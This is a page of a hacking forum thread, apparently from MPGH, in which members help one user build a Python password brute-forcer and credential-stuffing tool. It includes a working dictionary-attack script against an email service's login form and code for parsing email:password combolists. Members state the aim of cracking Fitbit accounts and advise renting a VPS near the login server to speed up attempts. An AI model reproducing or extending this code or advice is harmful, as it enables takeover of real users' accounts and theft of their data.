Page 2 of 3 FirstFirst 123 LastLast
Results 16 to 30 of 35
  1. #16
    ASERHaerheadrherherh's Avatar
    Join Date
    Mar 2014
    Gender
    male
    Location
    California
    Posts
    716
    Reputation
    23
    Thanks
    93
    My Mood
    Angelic
    Quote Originally Posted by Nimboso View Post
    I'd go python. Its a super easy language to write a brute forcer in. Here's an example of one I wrote for an email service. No proxy support or captcha bypass though. Just a basic example.

    Code:
        import requests, sys
        from bs4 import BeautifulSoup
    
        ses = requests.Session()
        login = ses.get('https://www.gm*****.uk/#.1730818-header-navlogin2-1')
    
        soup_login = BeautifulSoup(login.content, 'html5lib').find('form').find_all('input')
        loginDict = {}
        for u in soup_login:
            if u.has_attr('value'):
                loginDict[u['name']] = u['value']
        loginDict['username'] = 'hackmereddit@gm*****.uk'
    
        with open('dict.txt', 'r') as dict:
            for word in dict:
                word = word.strip()
                loginDict['password'] = word
                resp = ses.post('https://login.gm*****.uk/login', data=loginDict)
                print(word)
                if '.navigator-bs.gm*****.uk' in resp.cookies.list_domains():
                    print(word)
                    print(resp.cookies)
                    sys.exit()
    But you know, no one really likes python, and coding with some C language or .NET makes you look cooler

  2. The Following User Says Thank You to ASERHaerheadrherherh For This Useful Post:

    BlueCow (01-23-2017)

  3. #17
    BlueCow's Avatar
    Join Date
    Oct 2016
    Gender
    male
    Location
    UK
    Posts
    113
    Reputation
    10
    Thanks
    4
    I just installed requests (it looks easier to use) so, i'm gonna try and reproduce what you've done with requests to crack fitbit accounts, might need help with opening the file and splitting the combos. I'll keep you posted.
    BlueCow

  4. #18
    Nimboso's Avatar
    Join Date
    Sep 2015
    Gender
    male
    Posts
    554
    Reputation
    21
    Thanks
    2,636
    Quote Originally Posted by BlueCow View Post
    I just installed requests (it looks easier to use) so, i'm gonna try and reproduce what you've done with requests to crack fitbit accounts, might need help with opening the file and splitting the combos. I'll keep you posted.
    Should be pretty easy, it doesn't look like the fitbit dashboard has any captcha. If you get it working, I'd recommend renting a $5 VPS somewhere as close as you can get to the fitbit login server. A large time waste in brute forcing is network delay.
    Last edited by Nimboso; 01-23-2017 at 05:54 PM.

  5. The Following User Says Thank You to Nimboso For This Useful Post:

    BlueCow (01-23-2017)

  6. #19
    BlueCow's Avatar
    Join Date
    Oct 2016
    Gender
    male
    Location
    UK
    Posts
    113
    Reputation
    10
    Thanks
    4
    Well thanks for the information. I'll have to check this out later cuz for some reason I get errors importing requests into the python default IDLE but not when I use my terminal.
    BlueCow

  7. #20
    Nimboso's Avatar
    Join Date
    Sep 2015
    Gender
    male
    Posts
    554
    Reputation
    21
    Thanks
    2,636
    Quote Originally Posted by BlueCow View Post
    Well thanks for the information. I'll have to check this out later cuz for some reason I get errors importing requests into the python default IDLE but not when I use my terminal.
    You should use pycharm and python 3.x, whatever the newest one is

  8. The Following User Says Thank You to Nimboso For This Useful Post:

    BlueCow (01-24-2017)

  9. #21
    s p a c ebound's Avatar
    Join Date
    Jun 2016
    Gender
    male
    Posts
    35
    Reputation
    10
    Thanks
    2
    My Mood
    Drunk
    Quote Originally Posted by BlueCow View Post
    Well thanks for the information. I'll have to check this out later cuz for some reason I get errors importing requests into the python default IDLE but not when I use my terminal.
    Let us know how it goes man.

  10. #22
    Dead Meme's Avatar
    Join Date
    Jan 2017
    Gender
    male
    Location
    Australia
    Posts
    16
    Reputation
    16
    Thanks
    2
    My Mood
    Bored
    This isn't my area of expertise but I'd say try to borrow (not steal) some code from other crackers.

  11. #23
    BlueCow's Avatar
    Join Date
    Oct 2016
    Gender
    male
    Location
    UK
    Posts
    113
    Reputation
    10
    Thanks
    4
    Quote Originally Posted by Dead Meme View Post
    This isn't my area of expertise but I'd say try to borrow (not steal) some code from other crackers.
    Yup, I tried that.
    BlueCow

  12. #24
    BlueCow's Avatar
    Join Date
    Oct 2016
    Gender
    male
    Location
    UK
    Posts
    113
    Reputation
    10
    Thanks
    4
    Okay guys, so, I haven't worked on it for a long time but I thought about it today I did a bit more research and I encountered a problem. For now, the username and password to test on fitbi*****m are stored in 2 variables and so that means that I have to stop the program everytime they have been checked and change the combo to test another one. So, what I want to do is open a file called "combolist.txt" and for each line (one combo per line in emailass format), split the email and temporarily store it in the username variable and split the password and store it in the password variable. Once that's done the program will test this combo for fitbi*****m and return the result. Once it has tested it, it will go to the next line of the combolist.txt file and repeat the process. How can I open the file and split the combo accordingly and store the string in the 2 variables in python? Any help would be very appreaciated!!

    Btw here's what I have so far:
    Code:
    f = open("combolist.txt", "r")
    for combo in f:
    f.split(":")

    I know it's probably wrong but that's why I'm asking for help. Thank you !
    BlueCow

  13. #25
    Nimboso's Avatar
    Join Date
    Sep 2015
    Gender
    male
    Posts
    554
    Reputation
    21
    Thanks
    2,636
    Quote Originally Posted by BlueCow View Post
    Okay guys, so, I haven't worked on it for a long time but I thought about it today I did a bit more research and I encountered a problem. For now, the username and password to test on fitbi*****m are stored in 2 variables and so that means that I have to stop the program everytime they have been checked and change the combo to test another one. So, what I want to do is open a file called "combolist.txt" and for each line (one combo per line in emailass format), split the email and temporarily store it in the username variable and split the password and store it in the password variable. Once that's done the program will test this combo for fitbi*****m and return the result. Once it has tested it, it will go to the next line of the combolist.txt file and repeat the process. How can I open the file and split the combo accordingly and store the string in the 2 variables in python? Any help would be very appreaciated!!

    Btw here's what I have so far:
    Code:
    f = open("combolist.txt", "r")
    for combo in f:
    f.split(":")

    I know it's probably wrong but that's why I'm asking for help. Thank you !
    Code:
    with open('file.txt', 'r') as combolist:
        for combo in combolist:
            split = combo.split()
            if len(split) < 2:
                continue
            username = split[0]
            password = split[1]
    
            # Attempt login here
    using the "with open as file" closes the file on it's own when your script is done running.
    Last edited by Nimboso; 02-11-2017 at 11:01 AM.

  14. The Following User Says Thank You to Nimboso For This Useful Post:

    BlueCow (03-25-2017)

  15. #26
    javalover's Avatar
    Join Date
    May 2016
    Gender
    male
    Posts
    167
    Reputation
    10
    Thanks
    532
    Quote Originally Posted by Nimboso View Post
    Code:
    with open('file.txt', 'r') as combolist:
        for combo in combolist:
            split = combo.split()
            if len(split) < 2:
                continue
            username = split[0]
            password = split[1]
    
            # Attempt login here
    using the "with open as file" closes the file on it's own when your script is done running.
    You missed to split the ':' here:
    Code:
    split = combo.split()
    instead of splitting a space (by default that method's parameter gets a space).

  16. The Following 2 Users Say Thank You to javalover For This Useful Post:

    BlueCow (03-25-2017),Nimboso (03-30-2017)

  17. #27
    BlueCow's Avatar
    Join Date
    Oct 2016
    Gender
    male
    Location
    UK
    Posts
    113
    Reputation
    10
    Thanks
    4
    Quote Originally Posted by Nimboso View Post
    Code:
    with open('file.txt', 'r') as combolist:
        for combo in combolist:
            split = combo.split()
            if len(split) < 2:
                continue
            username = split[0]
            password = split[1]
    
            # Attempt login here
    using the "with open as file" closes the file on it's own when your script is done running.
    So that's the code:
    Code:
    with open('file.txt', 'r') as combolist:
        for combo in combolist:
            split = combo.split(:)
            if len(split) < 2:
                continue
            username = split[0]
            password = split[1]
    
            # Attempt login here
    Sorry, for answering so late, I was off mpgh for a while, thanks for the info.
    BlueCow

  18. #28
    Smirnoffq's Avatar
    Join Date
    Nov 2016
    Gender
    male
    Posts
    231
    Reputation
    10
    Thanks
    53
    My Mood
    Fine
    I have sad news for you... fitbit website is loaded dynamicaly with js, so requests wont work well (at least ony experience. I might be wrong ofc)

  19. The Following User Says Thank You to Smirnoffq For This Useful Post:

    BlueCow (03-30-2017)

  20. #29
    Nimboso's Avatar
    Join Date
    Sep 2015
    Gender
    male
    Posts
    554
    Reputation
    21
    Thanks
    2,636
    Quote Originally Posted by Smirnoffq View Post
    I have sad news for you... fitbit website is loaded dynamicaly with js, so requests wont work well (at least ony experience. I might be wrong ofc)
    With making the direct requests it doesn't matter if the page is loaded using js since you never actually load the page.

  21. #30
    HarryMidnight's Avatar
    Join Date
    Dec 2016
    Gender
    male
    Location
    Latvia and Canary isles
    Posts
    932
    Reputation
    33
    Thanks
    151
    My Mood
    Busy
    Quote Originally Posted by Nimboso View Post
    Pycharm is a good one, it's what I use.
    InteliJ IDEA (With python addon) for the win...
    Currently working on a huge project at work, so sorry for being not so active for the next month!

  22. The Following User Says Thank You to HarryMidnight For This Useful Post:

    BlueCow (03-30-2017)

Page 2 of 3 FirstFirst 123 LastLast

Similar Threads

  1. [WTS] Minecraft Cracker / Gift Code Methods / MC Accounts / Poison Plugin
    By Sandwich in forum Selling Accounts/Keys/Items
    Replies: 17
    Last Post: 06-07-2014, 03:15 AM
  2. How long till a code cracker comes out XD
    By santasfoot in forum Rust Discussions & Help
    Replies: 0
    Last Post: 01-25-2014, 10:53 PM
  3. [Solved] AQW code crackers...
    By vincelee1998 in forum Adventure Quest Worlds (AQW) Help
    Replies: 1
    Last Post: 12-15-2013, 03:54 AM
  4. [WTS] Selling Brute Force/Cracker Source Code
    By johnstalie in forum Selling Accounts/Keys/Items
    Replies: 3
    Last Post: 07-05-2013, 08:10 PM
  5. Sell pw cracker for runescape for retail code!!!
    By Maartenthebest in forum Trade Accounts/Keys/Items
    Replies: 11
    Last Post: 09-04-2007, 08:34 PM

Tags for this Thread